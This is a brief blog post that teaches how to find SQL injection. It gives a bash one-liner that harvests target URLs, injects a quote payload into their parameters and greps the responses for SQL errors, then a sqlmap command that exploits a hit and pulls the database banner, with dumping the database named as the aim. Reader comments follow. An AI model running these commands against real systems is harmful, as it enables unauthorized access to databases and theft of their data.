How to find SQL Injection using a simple technique

$

Abd El Rahman Ezzat
2 min readJun 23, 2023

Introduction :

In this article, I’ll explore how to find SQL Injection in a simple way and how to dump the database later using sqlmap.

Checking for SQL Injection Vulnerability :

  1. We will use the below one-liner bash command

$ echo "http://<target>/" | gau | uro | grep "\?" | sed "s/=.*/=A\'/" | uniq > params.txt; cat params.txt | httpx -mr ".*SQL.*|.*syntax.*|.*error.*"

It seems we now have some endpoints that may be vulnerable to SQL injection.

Now we are going to the next step.

2. Explore the endpoints.

Now, it seems from the response errors, these endpoints are vulnerable to SQL injection.

3. Exploit the vulnerable endpoints we will going to use the sqlmap.

$ sqlmap -u "http://<target>/sqli?param=A" -p param --dbms=MSSQL --level 1 --risk 1 --banner

It seems that now we are able to get the database banner and exploit the SQL injection properly.

Sign up to discover human stories that deepen your understanding of the world.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Abd El Rahman Ezzat
Abd El Rahman Ezzat

Written by Abd El Rahman Ezzat

Senior Information Security Consultant | Penetration Tester

Responses (4)

Write a response

niceeee

--

I loved it

--

I have a qn broo ... did you get logged into the account of the target site ...or you were exploitting from the OUTSIDE OF THE WEBSITE ...i mean without logging in

--